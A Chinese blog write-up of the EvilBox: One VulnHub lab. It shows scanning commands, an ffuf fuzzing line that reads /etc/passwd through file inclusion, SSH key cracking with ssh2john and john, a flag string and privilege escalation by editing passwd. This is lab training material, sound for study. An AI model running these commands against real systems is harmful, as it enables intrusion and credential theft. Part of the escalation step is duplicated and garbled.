EvilBox One靶场笔记

最新推荐文章于 2024-06-05 23:42:25 发布
最新推荐文章于 2024-06-05 23:42:25 发布
阅读量527 收藏
点赞数
文章标签: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_56426046/article/details/132156295
版权

EvilBox: One靶场笔记

信息收集

先fscan找主机192.168.1.102

namp扫端口

开放80,22端口

然后扫目录

└─$ gobuster dir -r -u http://192.168.1.102/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,bak,html

在扫secret目录,找到evil.php

页面空白,fuzz参数

└─$ ffuf -c -r -u 'http://192.168.1.102/secret/evil.php?FUZZ=/etc/passwd' -w /usr/share/seclists/Discovery/Web-Content/common.txt -fs 0

存在文件包含

在这里插入图片描述

尝试读取一些文件

读取私钥

在这里插入图片描述

爆破私钥密码
使用 john 的一个脚本把私钥转换成 john 可识别的 ssh 密钥文件:

/usr/share/john/ssh2john.py id_rsa > hash

使用 john 爆破密码

john hash --wordlist=/usr/share/wordlists/rockyou.txt

在这里插入图片描述

拿到第一个flag

56Rbp0soobpzWSVzKh9YOvzGLgtPZQ

提权

通过修改passwd文件提权

openssl passwd -1

在这里插入图片描述

下载复制替换

sswd -1

在这里插入图片描述

下载复制替换
在这里插入图片描述
弱小和无知,不是生存的障碍,傲慢才是

夜yesec
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
VnlnHub EvilBox---One
weixin_45682839的博客
09-07 866
VnlnHub EvilBox---One靶场通关攻略记录,涉及知识包括:端口服务探测、铭感目录搜集、参数爆破、任意文件包含漏洞、任意文件读取、ssh私钥爆破、linux本地提权(系统权限漏洞提权)
sqli-labs靶场练习笔记
11-09
sqli-labs靶场练习笔记,里面有2关 3关 4关 5关 4关 7关 8关 9关 11关 12关 13关 14关 15关 16关 17关 18关 19关 20关 21关 22关 23关 24关 的练习内容,可以供给初学sql注入的学者参考
EvilBox---One靶场实战
m0_72212352的博客
11-04 218
11.id_rsa 可以用于ssh登陆,但缺少密码,需要破解密码,需要用到一个脚本: ssh2john。使用john破解密码,使用kali自带的字典:/usr/share/john/password.lst。9.由于开放了22端口,尝试远程连接,看是否能使用密钥对登录,找到mowree的密钥。原因是由于查询到的密钥文件内容直接复制,然后在kali本地粘贴这些内容导致的。16.进入root目录下发现root.txt文件,查看其内容得到第二个flag。查看/etc/passw文件内容,发现mowree用户。
vulnhub靶场——EvilBox-One
Czheisenberg的博客
03-04 4671
vulnhub靶场——EvilBox-One WP
Vulnhub靶机:EVILBOX_ ONE(很详细)
LainWith的博客
07-08 2863
系列:EvilBox(此系列共1台) 发布日期:2021年08月16日 **难度等级:**低→中 **打靶目标:**取得 root 权限 + 2 Flag 靶机地址:https://www.vulnhub.com/entry/evilbox-one,736/ 涉及攻击方法:netdiscover主机发现 对于VulnHub靶机来说,出现“PCS Systemtechnik GmbH”就是靶机。 打开就是一个ubuntu站点,看不出什么东西,下一步自然是目录扫描了。 常规的dirsearch扫描完毕后,发现
【Vulnhub靶场EVILBOX: ONE
DG_s1mple
03-24 2418
环境准备 下载靶机后导入到vmware 靶机IP地址为:192.168.2.16 攻击机IP地址为:192.168.2.18 信息收集 使用nmap扫描一下靶机开放的端口信息 只开放了ssh跟http服务 我们访问一下他的网站看看 是最基础的网站,没有什么信息,我们扫描一下 有一个文件夹,我们也去访问一下 是一个空白界面,什么也没有,我们扫描一下这个目录下的文件 有一个php文件,我们也访问一下 也是空的 渗透开始 空的很正常,因为是php代码,所以我们爆破一下是不是有什么参数 发现是文件包
靶机渗透练习64-EvilBox:One
hirak0的博客
04-20 1980
靶机描述 靶机地址:https://www.vulnhub.com/entry/evilbox-one,736/ Description Difficulty: Easy This works better with VirtualBox rather than VMware 一、搭建靶机环境 攻击机Kali: IP地址:192.168.9.7 靶机: IP地址:192.168.9.62 注:靶机与Kali的IP地址只需要在同一局域网即可(同一个网段,即两虚拟机处于同一网络模式) 该靶机环境搭建
evil-box靶场记录
胖虎的博客
11-16 1080
evilbox渗透测试记录
vulnstack5靶场笔记
orange777
02-01 2383
红日靶场5
iwebsec靶场 XXE关卡通关笔记
mooyuan的博客
11-04 1388
iwebsec靶场xxe关卡通关笔记XML外部实体注入简称XXE漏洞。XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据,定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义,文档元素。内部声明是直接在XML文件内部声明的,对于安全人员来说基本没用。外部声明是引用XML以外的文件,有风险。外部实体注入可能导致任意文件读取,系统命令执行,内网端口探测,攻击内网网站等等。
webgoat靶场需要自行搭建
01-19
webgoat靶场需要自行搭建
渗透学习 webug4.0靶场
07-12
渗透学习 webug4.0靶场 渗透学习 webug4.0靶场 渗透学习 webug4.0靶场
二号靶场.zip
01-14
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,...
开源靶场zsbdzsbd
04-19
开源靶场zsbdzsbd
操作系统教材第6版——个人笔记3
最新发布
学徒心
06-05 733
这段笔记主要介绍了处理器相关内容,包括处理器与寄存器(如用户程序可见寄存器、控制与状态寄存器等及相关概念)、指令与处理器模式(机器指令、指令执行过程、特权与非特权指令、处理器模式及其切换等);还阐述了中断管理,涵盖中断的概念(包括狭义中断、异常与系统异常等)、中断源(如处理器硬件故障、程序性、自愿性、I/O 及外部中断事件等)以及中断系统(包括其构成、中断响应处理与指令执行周期、中断装置及中断响应过程等
专属编程笔记
u014397365的博客
06-01 1043
在软件开发中,Utils(或Utilities)目录通常用于存放一些。这些工具类或函数为整个应用程序或多个模块提供便利的功能支持,使得代码更加模块化、易于维护和重用。UtilsUtils目录的设计目的在于避免代码重复,并确保在整个项目中以一致的方式处理共通任务。这样做可以提高开发效率,降低维护成本,并确保代码的整洁性和可读性。
Vue3实战笔记(52)—Vue 3封装持仓分析饼图
山花的博客
05-30 671
接上文,封装持仓分析饼图。封装好几个组件,用于后续开发。把忧愁煮成茶,让它在心间慢慢沉淀,剩下的,便是清甜的回味。
pytorch学习笔记5
drarad的博客
06-02 1381
前向钩子(forward hook)在模块的前向传播开始时触发,前向后钩子(forward pre-hook)在前向传播之前触发,反向钩子(backward hook)在反向传播过程中触发。总结来说,钩子提供了一种在 PyTorch 模型的执行过程中插入自定义代码的方法,使得用户可以灵活地调试、监控和扩展模型的功能。作用: 这是一个内部的 C 语言指针,指向张量在底层库(通常是 C++ 实现的 PyTorch 核心)中的具体数据结构。这些钩子可以在张量的梯度计算之前或之后执行自定义的操作。
EvilBox---One
09-04
EvilBox—One是一个靶场,可以用于进行网络安全演练和渗透测试。你可以从靶场的官网地址https://download.vulnhub.com/evilbox/EvilBox—One.ova下载靶场的镜像文件进行安装。 在靶场中,你可以使用不同的工具和技术...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

夜yesec

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值